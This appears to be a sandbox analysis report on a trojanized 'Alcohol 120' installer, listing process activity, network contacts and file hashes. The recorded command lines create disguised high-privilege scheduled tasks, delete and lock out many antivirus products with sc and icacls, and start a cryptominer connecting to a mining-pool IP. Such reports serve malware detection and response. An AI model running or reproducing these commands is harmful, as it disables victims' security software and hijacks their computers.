PID 4868 wrote to memory of 548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 1380 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 1380 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 1380 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1380 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1380 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1380 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 1248 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 1248 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1228 wrote to memory of 1248 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1248 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1248 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1248 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1228 wrote to memory of 4996 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\ProgramData\Setup\taskhost.exe

C:\ProgramData\Setup\taskhost.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k -t4

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 85.218.89.152.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
RU 109.248.203.91:21 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
RU 152.89.218.85:80 taskhostw.com tcp
RU 185.139.69.167:3333 tcp
US 8.8.8.8:53 167.69.139.185.in-addr.arpa udp
US 8.8.8.8:53 8.167.79.40.in-addr.arpa udp

Files

C:\ProgramData\Setup\update.exe

MD5 36aadfa2332dc7e5077455ae5cb423ef
SHA1 47cdc34d12f4820a005bba735caed72296d2400a
SHA256 2240022c8262345cf4f7280141f53fc6fcc29b5436cf72a03581906665b9dda9
SHA512 4dfaae0949f7c362221d14d3d080e8eaa5d7a2e43892aec653f1045c2044a0d24390704774748ab7d1252ba8f3dea5008970f1e0d879ce3b3dc190002db2f56c

C:\Users\Admin\AppData\Local\Temp\aut6A92.tmp

MD5 ebe2c898363c9e42908504bf053ad018
SHA1 9b02d448e534d6078f117db09c7ceca3c63e8ea5
SHA256 f034d58596cbb1023b31c891bce2b14207700fa27fd1d5836b177327c9755175
SHA512 c8d23c03869541cf6f2d108ab00b790286f95b23d729a7d44a3b0cf75ba497831b0c1cbc6860e0d51e2d49edb03a2a9c3ee0272a7cc679ffd4f963df03010b86

C:\Program Files\Common Files\System\iediagcmd.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\ProgramData\RealtekHD\taskhostw.exe

MD5 53f8233b58b8e3ba3e92d82cca29f119
SHA1 ea7cae955f884aab7d048b6297fc0e472bb94a76
SHA256 a114d6bccc183021671bbb15426cf227ec487f2379094ed6f19e4211efd3ce65
SHA512 d1d4f385be4c8b8bdd16c8a8cc1fb75b6cee094ce69633724a4f53255dc560983097d26dc3b4d3e44a0eb718ac8ddb8d37c3b80f2c8747810f9c873ced558b23

C:\programdata\microsoft\temp\H.bat

MD5 ec45b066a80416bdb06b264b7efed90d
SHA1 6679ed15133f13573c1448b5b16a4d83485e8cc9
SHA256 cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e
SHA512 0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

C:\Windows\System32\drivers\etc\hosts

MD5 9901c0bbfe99666fac8ca6b3abbc6800
SHA1 7f17ae9ee3fe111213cb391cb380b51b8d298f9c
SHA256 1517e364d470f3bd25be8c0ca8714b4cf5ca70995f4d932041a001da8dde2622
SHA512 a3aaf2a55e35632575f5b6337def0135557a8b42141824dfc0a77484a58eed03b8004249bc2028e81f3e4c5cedae2853bc24d46a1418253c0969484c57f5915e

C:\ProgramData\RealtekHD\taskhost.exe

MD5 de88d7ec667dea756d236e9053d7eeb9
SHA1 ac6b619acece942f27d75e1e0ea46b94bc9b91a9
SHA256 7ce418c4a92d459b2a1971bd32ac4dfea3711393b1dce49d0c92d7124d71e157
SHA512 5c655def3bb5ab9c0255802e0c40667f16ef48f1042ff1c57e13199b38f0059cbff33517d6e940c39ca7d16d346830a92800e89058ae58ee02826472b0935942

C:\Windows\System32\drivers\etc\hosts

MD5 e335b19dd00855d6d352f8c0512bab33
SHA1 335f886a166b852beeb1dfec3d27eeced4a11547
SHA256 8f16e9d38dd11092dd0ef01e91c551aa15d161396e84c9b534de8d646118028d
SHA512 ef8cda0161d1be8a84942e20689163a880e3d95f7914a6c80f9b2714ca26fe5cbb677a2341ad5bda203e0cbad71b3df9a068e2accfc2164d132adfbdbb9adbcd

C:\Users\Admin\AppData\Local\Temp\aut5A9E.tmp

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

memory/1984-533-0x00000000004F0000-0x00000000005DC000-memory.dmp

memory/1984-539-0x00000000004F0000-0x00000000005DC000-memory.dmp

C:\ProgramData\WindowsTask\MicrosoftHost.exe

MD5 a74ad3584394b0766ada52191b245013
SHA1 6b25f4ba2c86541d4e2e5872a63fa1005373966b
SHA256 1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737
SHA512 5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

memory/2688-555-0x000002200C2B0000-0x000002200C2C0000-memory.dmp

C:\ProgramData\WindowsTask\WinRing0x64.sys

